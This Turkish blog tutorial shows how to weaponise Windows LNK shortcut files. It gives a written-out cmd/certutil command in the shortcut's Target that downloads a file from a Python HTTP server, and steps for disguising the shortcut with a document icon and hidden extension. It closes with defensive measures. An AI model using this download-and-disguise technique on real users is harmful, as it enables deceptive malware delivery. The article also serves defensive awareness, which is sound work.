Herkese selamlar! 🙂
Bu makalede, LNK dosyalarını kullanarak zararlı yazılımların nasıl dağıtılabileceğini adım adım ele alacağız. Özellikle, kısayol dosyaları (LNK) içerisine zararlı komutlar ekleyerek, certutil.exe ve Python HTTP sunucusu gibi araçlar kullanarak uzaktan dosya indirme işlemlerini nasıl gerçekleştirebileceğimizi göstereceğim. Ayrıca, bu tür tekniklerin nasıl çalıştığını anlamakla birlikte güvenlik önlemlerini de detaylandırarak sistemlerinizi bu tür tehditlerden nasıl koruyabileceğinizi anlatacağım.
- LNK Dosyası Nedir?
LNK dosyaları, Windows işletim sisteminde kullanılan kısayol dosyalarıdır. Bir programı, dosyayı veya klasörü çalıştırmak için kullanılan bu dosyalar, hedef dosya konumunu ve çeşitli komut satırı parametrelerini içerebilir. LNK dosyaları normal bir dosya gibi görünse de içine yerleştirilen özel komutlar ile zararlı işlemler tetiklenebilir.
- LNK Dosyası ile Zararlı Komut Yerleştirme
Adım 1: Kısayol Oluşturma
Herhangi bir dosyanın kısayolunu oluşturmak için aşağıdaki adımlarla oluşturulabilir:
- Hedef Dosya Seçimi: Bir dosyaya sağ tıklayıp “Kısayol Oluştur” seçeneğini seçin.
- Hedef (Target) Değişikliği: Oluşturulan kısayolun “Özellikler” bölümünde “Hedef” kısmına zararlı komutlar eklenebilir.
Örnek Zararlı Hedef:
“cmd.exe /c certutil.exe -urlcache -split -f “http://localhost:8001/test.rtf” “C:\Users\mkcirik\Desktop\test.rtf””
Açıklama:
-
- cmd.exe /c: Bir komut satırı çalıştırır ve sonra kapanır.
- certutil.exe: Windows’ta bulunan bir araçtır ve dosya indirme amaçlı kullanılabilir.
- http://localhost:8001/test.rtf: Dosyanın uzaktan indirileceği sunucu adresi.
- “C:\Users\mkcirik\Desktop\test.rtf”: Dosyanın hedef konumu.
- HTTP Sunucusu Oluşturma
LNK dosyasının çalıştıracağı komut ile dosya indirmek için bir HTTP sunucusu kurmak gereklidir. Python kullanarak hızlıca bir HTTP sunucusu ayağa kaldırabilirsiniz.
Adım Adım HTTP Sunucusu Kurulumu:
- Komut Satırını Açın:
“python -m http.server 8001”
-
- Bu komut ile 8001 portu üzerinde bir HTTP sunucusu oluşturulur. (Ben burada 8001 portunu verdim ancak siz boşta olan herhangi bir port numarasını verebilirsiniz. :))
-
- Tarayıcı üzerinden http://localhost:8001/ adresi ile sunucunuzda ayağa kaldırdığınız dosyaları görebilirsiniz. Burada benim örneğimde yer alan “test.rtf” dosyası yer almaktadır.
- Certutil Kullanımı ile Dosya İndirme
Certutil.exe Nedir?
certutil.exe, Windows işletim sistemlerinde sertifika yönetimi için kullanılan yerleşik bir araçtır. Ancak bu araç, saldırganlar tarafından dosya indirme aracı olarak sıkça kullanılır.
Dosya İndirme Komutu:
Aşağıdaki komutla, hedef makinede belirli bir sunucudan dosya indirilebilir:
“certutil.exe -urlcache -split -f “http://localhost:8001/test.rtf” “C:\Users\mkcirik\Desktop\test.rtf””
Parametre Açıklamaları:
- -urlcache: URL’den dosya indirirken dosyayı önbelleğe alır.
- -split: Büyük dosyaların parçalar halinde indirilmesini sağlar.
- –f: Zorla dosya indirmeyi gerçekleştirir.
- LNK Dosyasında Görünümü Gizleme
Bir LNK dosyasının zararlı işlemler içerdiği anlaşılmasın diye aşağıdaki adımlar uygulanabilir:
Adım 1: Simge Değiştirme
- Kısayolun “Özellikler” sekmesinden “Simge Değiştir” butonuna tıklayın.
- Sistem içindeki güvenilir simgelerden birini seçerek dosyanızın görselini güvenilir bir dosya gibi gösterebilirsiniz (örneğin bir Word belgesi, PDF simgesi vb.).
Adım 2: Dosya İsmi Uzantısı Gizleme
Dosya isminin sonunda .lnk uzantısını gizlemek için aşağıdaki ayar yapılabilir:
- Windows Dosya Gezgini’nde “Görünüm” sekmesine gidin.
- “Dosya adı uzantılarını göster” seçeneğini devre dışı bırakın.
Bu sayede kullanıcı, zararlı LNK dosyasının yalnızca bir belge gibi göründüğünü düşünebilir.
- LNK Dosyası ile Zararlı Yazılım Taşıma Senaryosu
Senaryo:
- Aşama 1: Bir LNK dosyası oluşturulur ve hedef kısmına zararlı bir komut eklenir.
- Aşama 2: Kullanıcı dosyanın normal bir belge olduğunu düşünerek açar.
- Aşama 3: LNK dosyasının tetiklediği komut, arka planda certutil kullanarak zararlı dosyayı indirir.
- Aşama 4: Zararlı yazılım indirilip çalıştırılır.
- Zararlı LNK Dosyalarına Karşı Alınabilecek Önlemler
- Dosya Uzantılarını Göster: Dosya adı uzantılarını her zaman görünür yaparak LNK dosyalarını tespit edebilirsiniz.
- Güvenilir Kaynaklardan Dosya İndirme: Bilinmeyen e-posta veya indirme kaynaklarından gelen dosyalardan kaçının.
- Sistem Araçlarını İzleme: Certutil gibi araçların olağan dışı kullanımlarını güvenlik yazılımları ile tespit edin.
- Antivirüs ve Güvenlik Yazılımları: Güçlü bir antivirüs programı ile zararlı kısayol dosyalarını tarayın.
Sonuç
Bu makalede, Windows LNK dosyalarının zararlı amaçlar için nasıl kullanılabileceğini adım adım açıkladık. LNK dosyalarının özellikleri, hedef kısmında komut çalıştırma yetenekleri ve certutil gibi yerleşik araçlar ile zararlı yazılım taşıma yöntemlerini detaylandırdık. Bu tür saldırılara karşı kullanıcıların farkındalığını artırmak ve güvenlik önlemlerini uygulamak büyük önem taşımaktadır.
Certutil Kullanımının Sigma İle Tespiti:
Faydalı olması dileğiyle. 🙂